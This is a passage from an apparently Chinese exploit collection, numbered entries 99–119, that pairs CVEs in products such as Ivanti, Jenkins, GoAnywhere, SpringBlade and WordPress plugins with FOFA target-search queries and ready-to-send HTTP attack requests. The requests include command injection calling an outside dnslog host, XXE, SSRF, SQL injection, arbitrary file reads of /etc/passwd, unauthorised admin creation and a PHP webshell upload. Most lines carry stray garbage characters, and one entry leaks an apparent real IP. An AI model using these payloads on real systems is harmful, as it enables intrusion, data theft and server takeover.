Content-Type: application/x-www-form-urlencoded; charset=UTF-8 |% r7 J) F+ s, \: l
X-Requested-With: XMLHttpRequest
+ |+ w. v; a8 z- v9 ^( Z
, @7 {# w; s9 S5 L2 Tid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B* e, X, P8 z$ H3 } E& W
2 x+ b% Y/ R& S8 B( W1 ` M, X# z( l) r7 S
99. Ncast盈可视高清智能录播系统busiFacade RCE- y2 f% l1 |3 s: v0 F
CVE-2024-0305# Y0 M( l1 N0 K8 v; ?5 F
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
& j+ ]+ G( O' z8 GPOST /classes/common/busiFacade.php HTTP/1.1
) L: N/ Q% C% aHost: 192.168.40.130:8080
& |$ f+ L5 x5 w; C. L7 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* @$ g8 V2 [) @; e! g: |Connection: close2 @+ r; ]8 _1 e* N6 F3 H
Content-Length: 154
4 ^; t a& z( v+ X! }Accept: */*9 q* K! j; W+ I* G6 f
Accept-Encoding: gzip, deflate
' A$ E/ d5 b/ |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 q, }! J2 A# L; P- RContent-Type: application/x-www-form-urlencoded; charset=UTF-8: r7 t {3 @. K3 O
X-Requested-With: XMLHttpRequest2 v% \; [4 P/ B! \0 S9 L/ t: q O( n
: j. }& L3 n3 |" G
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
9 Y/ ~5 a8 Z2 M, r, b
2 x! @, V1 y2 B4 [# t; ^
" X7 G& V* t+ D; N, @& L, P, M100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传6 W# U5 q. D6 _' S& \3 L
CVE-2024-0352
/ I5 _: u- b" f% YFOFA:icon_hash="874152924"4 ?& X3 K$ L0 Z; w* q' T) `/ P
POST /api/file/formimage HTTP/1.1
# C- x) T* p! B3 {" O6 Z; SHost: 192.168.40.130
7 V: f$ z6 t2 F9 CUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ y" D; I+ ?% |- f9 b% r' {$ [Connection: close
" q& U- J8 c5 o0 k8 d: \Content-Length: 201
* H) b. M/ y- G/ sContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei) w, T/ A" M- \6 G! I
Accept-Encoding: gzip# Q4 ~2 }' c2 ~. j+ P# v
4 j* S" Y1 M' i- Y5 _, I+ Y------WebKitFormBoundarygcflwtei$ W2 b8 l& ?- j( w6 c
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
2 ]* R4 ?$ }5 _) t" @Content-Type: application/x-php
2 l5 p* \" y5 ~0 G4 S$ E% I, @2 n) y, [/ |
2ayyhRXiAsKXL8olvF5s4qqyI2O
3 @/ Z4 K6 G. G# `) z4 ]% E8 U8 @------WebKitFormBoundarygcflwtei--5 _" V: _* b; L. [+ V
% ~2 b2 z6 d- C2 p, F: p7 R- Q3 Y) w* _$ q! _3 ]
101. ivanti policy secure-22.6命令注入
( G/ Q4 W) ]$ h1 d0 qCVE-2024-21887
. K6 Q/ x' `2 e7 v+ lFOFA:body="welcome.cgi?p=logo"& _5 g% i4 W" ?/ {
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
3 l' ^/ v" G. D+ y, }6 V& a, c' i4 IHost: x.x.x.xx.x.x.x6 q: k: e$ Y7 H' J* Y; c, m2 T9 f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( ^7 E3 q$ I7 t" y6 u( ?5 o) uConnection: close6 t& O% S3 x5 D' d2 Z
Accept-Encoding: gzip5 x( P/ g, v" y: S
3 ?' D& c2 l( V- K9 c
* _4 R% F, }9 E5 }0 Z; G4 z9 ^102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
3 O7 \6 U9 X" L/ e. kCVE-2024-218931 ~7 i0 P& e0 b, a" Q
FOFA:body="welcome.cgi?p=logo"4 ]2 p/ g3 u4 ^( u. B
POST /dana-ws/saml20.ws HTTP/1.1% h- u4 y `. z# z/ p5 H3 h
Host: x.x.x.x
2 a: ? D& _$ v& s/ {0 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 r3 w+ `2 o5 W+ }6 ^6 p0 L
Connection: close' r' c4 m' W) O' D, H+ I
Content-Length: 792/ N, O1 o, K# D
Accept-Encoding: gzip9 ~6 G* s/ N @. _% F# @4 R
$ w9 d& Y! h* Y8 m) l
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
0 S2 h3 j: z4 w. V C) ?
' [, P4 J q3 ]3 U) `1 ^103. Ivanti Pulse Connect Secure VPN XXE
! w% D: g" Q/ } @CVE-2024-22024
: W# F4 e% z( Q9 QFOFA:body="welcome.cgi?p=logo"1 p! M, a# ~' t2 P8 o# R$ I
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
: Q9 H* F( t8 dHost: 192.168.40.130:1116 J) ^* D& ]. N- @/ B6 M
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
2 k8 K4 Y$ J3 S1 ]( Q: ?( kConnection: close7 A/ R7 Y- s) R n9 v; p" Z
Content-Length: 2043 {, H( s1 Q; b' q* [# M5 _: I
Content-Type: application/x-www-form-urlencoded" {# k% F9 o2 ]% n
Accept-Encoding: gzip
6 }5 S% E& G' W' Z3 d+ b1 A& C4 q8 A( r& @% @5 _; Z+ B$ e$ y) N
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==( s A+ u% z# z+ x; T; W* S
6 K' E: z3 ^* `( N; q7 G" W! L2 }
- I2 S; H9 E, W
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
! Q9 O- D. I' m, p<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>$ Z1 ~% d; x$ G4 t' u, F2 i; S
- i! a( u+ H9 ], ?7 W! R# K9 C% ^- j% V9 v, Y8 d. M- V- M1 A
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
+ ?) ` J* ]% f* kCVE-2024-0569
/ L, I0 z* E/ r. z# c: t# A' |2 UFOFA:title="TOTOLINK"% {$ L/ d) a. ^$ V
POST /cgi-bin/cstecgi.cgi HTTP/1.1
! I, C/ |" W- X: t" YHost:192.168.0.1
0 Z, R3 w/ k/ \; HContent-Length:41& E' H, M" `7 `7 R! l3 _' V* r/ Z
Accept:application/json,text/javascript,*/*;q=0.01
, ^: ^" u, a: b% |+ JX-Requested-with: XMLHttpRequest1 u& x; d* ^8 B' O1 o
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36$ T: |# ]3 X: [5 [8 \
Content-Type: application/x-www-form-urlencoded:charset=UTF-88 ]: @' M/ j# K- n d/ d
Origin: http://192.168.0.1, J! S C- g4 _- E& T( w8 E
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
" q1 x, x% _& I: @' _% hAccept-Encoding:gzip,deflate+ b( I6 w3 D9 N/ o, D) a A! m
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.75 q% p6 L- L; Y+ U
Connection:close7 t: z9 l4 r1 H+ B
5 s- J. c7 L3 H M( f{. D& G D9 `" d
"topicurl":"getSysStatusCfg",$ n% Q- H: Q. @1 ?) \
"token":""
, p+ H. M0 i; ], j}6 U( v0 p& g4 n3 L. M! T
! L1 Y0 @) M L$ m105. SpringBlade v3.2.0 export-user SQL 注入% V" O/ X- X+ S6 | v7 T
FOFA:body="https://bladex.vip"' @" r/ g. a$ d" M! s, [0 z
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
4 k/ ~5 `& c. y$ W) t% ` e, {5 L$ w: a' R K# C, Y: p
106. SpringBlade dict-biz/list SQL 注入
! p3 l# Q% N! W/ ?FOFA:body="Saber 将不能正常工作"' w2 F) A# S" i6 |& G R
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
' m5 y7 \. L7 a# q+ U' P) pHost: your-ip# M5 s5 M6 N6 m/ W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; g ]% B2 {" B) \7 m% l$ n
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A. n, L8 ]& [, O$ N+ ?
Accept-Encoding: gzip, deflate
8 N3 q$ B5 }3 [! h* xAccept-Language: zh-CN,zh;q=0.97 B1 N$ b4 b- }$ m& O# k; a8 C9 C8 H
Connection: close7 Z; E& K; T" v7 r$ I1 p) E
L& [. Y2 M1 s& V0 A' j! p9 N
/ o2 s6 @0 o9 h2 I5 E! T5 }5 P0 K107. SpringBlade tenant/list SQL 注入, {4 p: D8 ?* Q8 u: E
FOFA:body="https://bladex.vip"
- R7 H# i2 \% d5 Y- ^4 F# CGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.14 Q; p) b. J! v9 y4 O, W. N3 {
Host: your-ip9 F1 S6 l. @: q6 X. ]1 _8 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) C1 y8 o$ [; j# @5 E- g8 FBlade-Auth:替换为自己的0 y+ p! F5 j4 J$ d1 c) X" N
Connection: close# u& [4 ~' X& J/ W( `# B
& s) A: ~: J3 ^6 t7 I
r, X/ S4 L1 {& Q108. D-Tale 3.9.0 SSRF
# b. c9 R3 X& l/ v6 C+ eCVE-2024-21642! m% |) i" s- x& S1 i( A, ~6 o
FOFA:"dtale/static/images/favicon.png"8 i: ~+ ^5 }( Z/ X$ G. l
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
& Z0 s l; t* }8 MHost: your-ip
7 g W4 D" g' ?$ VAccept: application/json, text/plain, */*
, c/ f3 l+ {* C$ X$ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 E6 G! B- c6 b" \% fAccept-Encoding: gzip, deflate
5 Y5 y2 w6 Y3 \) M0 r) eAccept-Language: zh-CN,zh;q=0.9,en;q=0.88 _1 I6 x0 o+ {) W( h3 y
Connection: close+ f+ L* q7 ?; f) k% f0 e' w4 h, f
& s, e% S8 v" K9 ?+ B0 G
7 P2 }3 F" L/ D5 O& M6 ~( _/ F
109. Jenkins CLI 任意文件读取
( h+ N! g0 n6 W, S* b4 a. [CVE-2024-23897' Y0 m6 [ @! A- a( z
FOFA:header="X-Jenkins", B' I8 R3 f7 M: n6 N
POST /cli?remoting=false HTTP/1.1
+ G# G6 J" Q- d' g/ R5 CHost:
; J3 N& l/ c7 U( _5 O2 {Content-type: application/octet-stream
, E5 D- q0 e* z+ _4 LSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
3 \6 m& M( E" E' g; E9 M GSide: upload5 A0 h8 D+ c/ c$ B
Connection: keep-alive
' [& Q1 X- s8 x, sContent-Length: 163
, D- i" O5 H, G2 x& N( n% j. n: s' |. [, v8 o
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'$ v: { R( Z$ I) w. O
; h9 }1 ]. y! c% _/ a
3 d3 l* \# k# {; q) [POST /cli?remoting=false HTTP/1.1
6 f4 |- {% `: HHost:
2 _$ h& [0 {- \1 m. a1 L$ W2 P! cSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
! _, h6 d1 ?" @: r' H W4 K) [7 _download! H* L8 p; f! H( a# _
Content-Type: application/x-www-form-urlencoded
5 a0 |3 y# U4 W4 R. m' RContent-Length: 0
- G- R& }$ V* o' c0 g9 E8 T; h: F, g3 ~+ x/ U
* X) X! Y6 j! R# f0 BERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5 Q- K7 A4 U( L" {' }; G8 Xjava -jar jenkins-cli.jar help
- K" h+ r" ]8 ~+ _) P[COMMAND]4 k: A7 R4 `& o, _3 D
Lists all the available commands or a detailed description of single command.
# u- _2 J3 c, K e0 O COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
2 f. l* c. U3 z$ L! G. z
9 q2 W. d$ A* ]$ A2 D6 |) K x& D
# S4 W; D3 A7 ~8 X. b. S, M110. Goanywhere MFT 未授权创建管理员
. G7 r) d" @4 D+ W: S, i; V! aCVE-2024-0204
- u. M3 q: B% m t& OFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"' v/ H7 Z) x# m" |, c! ?
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
, ~ g, H4 _# Z8 J( RHost: 192.168.40.130:8000 {, y4 Q" V2 ~
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36# A, @2 y* F/ M$ ?( _; U T) c
Connection: close, C6 f; Y: w5 c
Accept: */*; ^! W) \$ h: E( _2 ~" g! h7 A5 w
Accept-Language: en
' g T" o$ Y; c, Y u7 K& K% tAccept-Encoding: gzip
/ O9 A' y2 v2 C0 N9 q3 Q+ T6 E7 T; d3 C! s' i! a5 I1 i2 Q
% u1 d2 b0 Z* h( k/ S* B: d+ i
111. WordPress Plugin HTML5 Video Player SQL注入
" m$ a) t* B: s, {/ gCVE-2024-1061, P; v0 O$ j7 A
FOFA:"wordpress" && body="html5-video-player": U9 O: z! G8 [3 Z5 D: {
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
: f. ?% C7 q/ `& }* z" fHost: 192.168.40.130:1126 M1 N ?" c8 _9 H$ j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
; Y- ?6 X( L% ^5 \+ D) K! fConnection: close/ _6 q) Z- b# ^* P' l) u# h9 h
Accept: */*
' r* |% t' Z2 ^9 Y# j% EAccept-Language: en9 J& u7 L& L7 u+ J& s
Accept-Encoding: gzip
& x/ u E( G% ~) _& y7 M- M8 {2 h+ I; ?! N0 {
. k! l0 O: U. g, e- f w
112. WordPress Plugin NotificationX SQL 注入
* U) w4 A9 b6 j; Z/ aCVE-2024-1698
1 f Y1 b- ^2 E# {: i% [FOFA:body="/wp-content/plugins/notificationx"* R! `0 p6 x9 m4 C" e6 d! w
POST /wp-json/notificationx/v1/analytics HTTP/1.1, K- J z- h6 c! Q$ M4 T
Host: {{Hostname}}7 L1 n" ~* t+ b% v
Content-Type: application/json
8 d0 c3 v; p% h3 z' }/ T, y2 ?5 l8 J! x1 C0 v
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}. w& g! V1 H, ^. @: {
, L5 e) y* B- z3 @; Z+ b( o1 O) t4 g5 U
113. WordPress Automatic 插件任意文件下载和SSRF
% J1 p9 U x- W M( N; mCVE-2024-27954
3 `1 w: [6 m |( ^# QFOFA:"/wp-content/plugins/wp-automatic"
0 i# L& Z8 K b zGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.18 b3 H, L/ s G2 {
Host: x.x.x.x
+ P- r, x8 S! ?2 `) h, hUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
; F @4 Y) F9 u1 D! b2 h: uConnection: close8 J* F' c& T% c9 O6 c
Accept: */*& T* ?7 N9 m" O! @) P3 i
Accept-Language: en8 W# y T- i4 ^! l
Accept-Encoding: gzip
3 v; b4 j$ `" ^! A7 q4 Q* U& c9 Y2 w" |
( ?/ O. i1 Y& g- e! Z
& e0 _( _- O, k114. WordPress MasterStudy LMS插件 SQL注入- l5 B3 L0 L; f- L( A% s+ B9 v) d
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
" u; G/ Z+ [7 D1 eGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1 l+ F8 g+ }7 Y7 Q* s% @
Host: your-ip' y* F+ u r. Q+ }6 Y$ \' q' n
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* Z0 W: h2 K/ z8 I$ b
Accept-Charset: utf-8! A5 l6 K, u$ u, E
Accept-Encoding: gzip, deflate, e6 \7 I0 t1 A5 ]
Connection: close) A: O1 p6 q+ z3 {5 \# e1 i/ K
7 G- d% |3 z% {. Z0 Y# r" x; E# N' s3 n4 V8 }. x" s3 p' n4 \# }
115. WordPress Bricks Builder <= 1.9.6 RCE8 |' P( k# p) g# P
CVE-2024-256001 j) r' b2 P9 j8 ]/ c
FOFA: body="/wp-content/themes/bricks/"+ C- v" t% K6 ?% f
第一步,获取网站的nonce值
9 B3 C6 O8 c1 C$ N$ b% cGET / HTTP/1.1
, ~+ W: J$ r8 ?+ G ~) yHost: x.x.x.x% W& v) B' I3 ]6 j' X* x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
7 b( K8 }/ P* j- A( TConnection: close
7 t/ L# i) n; E9 L* Z" UAccept-Encoding: gzip Z4 Y1 q! y/ `: J3 }
( A/ o T+ g# L2 `. w
! P" N0 f9 s* F6 G6 \第二步替换nonce值,执行命令
/ D) A# w* R" v; y& O" zPOST /wp-json/bricks/v1/render_element HTTP/1.1- u# A2 R6 Z' @+ k3 F3 _
Host: x.x.x.x* v7 V+ x9 p( t7 R2 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 G! j" i4 D" Y/ ^# X
Connection: close6 ^$ F5 n7 p% E$ y [, P. l6 d
Content-Length: 3560 ?) P2 D0 _8 ]6 T; `. @% f8 r
Content-Type: application/json/ Q+ V/ |5 R6 U2 o8 |; a
Accept-Encoding: gzip$ t3 F8 g9 U7 X L7 Z0 \# W
/ P. \ q* } X d( a- r" z: P: X{
+ e' K2 E4 X# P1 u+ s) n4 s- g- t# l! {"postId": "1",! H9 K" d2 e+ Y* x
"nonce": "第一步获得的值",0 u A3 T) {8 |/ c" R
"element": {
+ i4 \7 `1 R% \. n8 L/ T+ m3 A "name": "container",
1 o2 S5 a; i9 y" T# {) F "settings": {
" ~/ M' R8 c8 D& b1 g/ h "hasLoop": "true",6 g7 n4 l7 u, @$ t6 y1 q
"query": {
r) Q: C% }. P9 Z* p8 \2 W, n$ C0 T "useQueryEditor": true,6 U$ y3 p G% g+ |
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",4 O3 X+ \! G z: q
"objectType": "post"
/ y% ?; b, i- D) _% R) Q }
; L2 ?. X* {- T8 o$ q0 S, w }) j a8 i% j0 w H w: E. f
}0 ]7 k# M4 ^- `$ z/ b
}# ]$ ~3 `+ U% x2 k' e/ v
! h, I! W: q5 s6 P1 X$ k4 b; p) |. o- g
116. wordpress js-support-ticket文件上传( \- _9 A' Y# N
FOFA:body="wp-content/plugins/js-support-ticket"
# H# B; V5 `2 i# d/ T- j; KPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
& {" o" S4 s& RHost:
: v' C" K3 {. E/ ?" n; s) Y% eContent-Type: multipart/form-data; boundary=--------767099171
6 O% q1 G- r9 ^; H3 i& eUser-Agent: Mozilla/5.0 o) B$ g& x, g1 R& a v; W
8 Q) g$ r3 q+ B' m4 d----------7670991710 N# R9 @2 I1 S4 P1 I9 {7 y
Content-Disposition: form-data; name="action"8 Z$ [" E1 s5 {& ], O
configuration_saveconfiguration0 |7 @1 r" R5 o* J m0 v8 c$ [
----------767099171- I0 q: x& [ F0 B7 v' R: ]# e$ }
Content-Disposition: form-data; name="form_request"
8 w+ r. R, D# ^) w9 B- K% wjssupportticket/ c' S, E6 G$ e% G2 [% o( N) S. f
----------767099171! g8 y! G; T% f5 q
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"- F: Z3 E! w" K9 k
Content-Type: image/png
4 ?0 ]( z6 s. Y9 F0 Q----------767099171--4 D8 s3 Q( \' E6 ^
# m1 B) t& H' f- z6 W3 [2 l! u* m/ C
/ d' m" v0 \1 e t
117. WordPress LayerSlider插件SQL注入
4 I! R7 e; M: T# Iversion:7.9.11 – 7.10.0
, M/ v# c) [! L, n/ a7 b! ]+ i2 KFOFA:body="/wp-content/plugins/LayerSlider/"* e8 W' W$ E9 d2 y% Z; `0 E) O0 S& n
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1! B0 g2 W1 ]) n: M; m
Host: your-ip& x3 T. V' R9 e( w+ ~; A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) P% B1 z0 J7 J% c& ~/ s8 Q2 N7 X$ U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ v' X: F+ A( c! m- P' a2 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& C: _, Q* i9 ~* t
Accept-Encoding: gzip, deflate, br
# S) J5 @' j0 W7 {Connection: close
2 s+ k0 p3 V# M% C6 pUpgrade-Insecure-Requests: 1# ? C3 D- w3 |8 a3 U& L" l
6 F1 q5 U& Q7 p8 K0 m2 E
! M. ? \& O( Q* J# y( L! A- Z" e) k118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
8 |( M, J2 s( D, OCVE-2024-09391 [; U9 T9 H4 k* i' }
FOFA:title="Smart管理平台"
; m; |2 Q1 ^+ w. k; F4 C6 sPOST /Tool/uploadfile.php? HTTP/1.1 G: _# r* y9 \
Host: 192.168.40.130:8443 A9 G/ s* z; J' i0 B3 {" n
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f82 s, i) d+ p8 z: ^! j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
/ R% h) N/ A$ h5 Y' L% PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 S9 v1 R5 z% _ F' I1 D8 n" OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( K# u; m4 J0 f& s; tAccept-Encoding: gzip, deflate
0 j6 O5 r$ L( Y% l4 P; T! HContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
/ y* t- q# Q, L* X* ^( u3 e! iContent-Length: 405& X E8 D" B" E0 V
Origin: https://192.168.40.130:8443
( q" R0 b. c, @4 Y: eReferer: https://192.168.40.130:8443/Tool/uploadfile.php
4 H) L7 k% z7 f( a$ W$ LUpgrade-Insecure-Requests: 1
5 Z8 P0 `6 F7 H4 q; XSec-Fetch-Dest: document
! R: Z: E7 Z- ?; _& @7 XSec-Fetch-Mode: navigate
) p4 U$ R2 Q0 s& K2 LSec-Fetch-Site: same-origin
+ I4 h' u+ ]. R5 w4 \4 V" fSec-Fetch-User: ?1+ t3 j# y6 [$ c8 h4 c
Te: trailers4 `# P" e2 N) _( P: k
Connection: close8 A7 d- _2 }/ B; V2 f+ z( ^/ N
# z; C/ W9 C" Z9 o( X+ b! k7 |
-----------------------------13979701222747646634037182887
) m7 c, v& J0 ^% XContent-Disposition: form-data; name="file_upload"; filename="contents.php"
- @3 W5 E ?: j' i. g' ?Content-Type: application/octet-stream
t) x- g7 c: E) [
5 e4 D, V6 l1 [8 Z/ F. ?( V- P<?php
, g' U8 Z3 \. l9 nsystem($_POST["passwd"]);
B }) H3 v4 B% z% L" V?>
' v& @( }/ t; e5 ]9 A9 w-----------------------------13979701222747646634037182887
3 M6 T9 y u1 L; x0 Z) mContent-Disposition: form-data; name="txt_path"% i* h* b8 z# b$ H9 e0 q+ S3 v
2 j; K, b; [7 K2 A5 [0 v- E$ w/home/src.php9 B7 s: }4 l$ Y% a/ L
-----------------------------13979701222747646634037182887--
. ]8 h$ z5 |$ \# A" p, F6 L
# J; b' `, z' G( c# c/ c0 B! {: _1 }
访问/home/src.php
3 R, D( Q4 O9 B: ~* x9 q
4 B9 f1 }8 O% r5 N$ _119. 北京百绰智能S20后台sysmanageajax.php sql注入 W! }# Y& I8 n s
CVE-2024-1254" J. q( m2 v- p* X# N0 j/ w/ b" a- h
FOFA:title="Smart管理平台"
8 X& _' j& ^3 c2 G先登录进入系统,默认账号密码为admin/admin
1 M2 s7 f" F: P9 D( w. Z' NPOST /sysmanage/sysmanageajax.php HTTP/1.11
) Q6 R) T2 X& l, d5 x+ N2 jHost: x.x.x.x
, G% P3 a( q! W4 Z- p& D8 ECookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
6 c; D2 u/ l1 m" [+ s% C& OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
7 X1 ~% R4 h2 V* B; V7 C6 EAccept: */*9 [ o4 r6 i1 ?9 H2 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Q9 b& e( z/ ]Accept-Encoding: gzip, deflate: o2 O# i2 ~/ z) V% y
Content-Type: application/x-www-form-urlencoded;0 U1 K; |9 E. S5 o& @; z' r' A, X
Content-Length: 109
1 A) x8 S+ z* `* b# TOrigin: https://58.18.133.60:8443
7 I# q0 v- r: P. [* WReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
6 ~. W* P7 s, \4 [. @Sec-Fetch-Dest: empty
7 Y+ X! _; V- `Sec-Fetch-Mode: cors6 O2 {1 R/ F2 _* A! f
Sec-Fetch-Site: same-origin' U4 x' _/ J9 @/ W* U2 f2 G
X-Forwarded-For: 1.1.1.1
' Y% t9 |7 L0 s9 O7 DX-Originating-Ip: 1.1.1.1, ~$ x. @3 b0 }' K% n; w! Y& ~1 W
X-Remote-Ip: 1.1.1.1
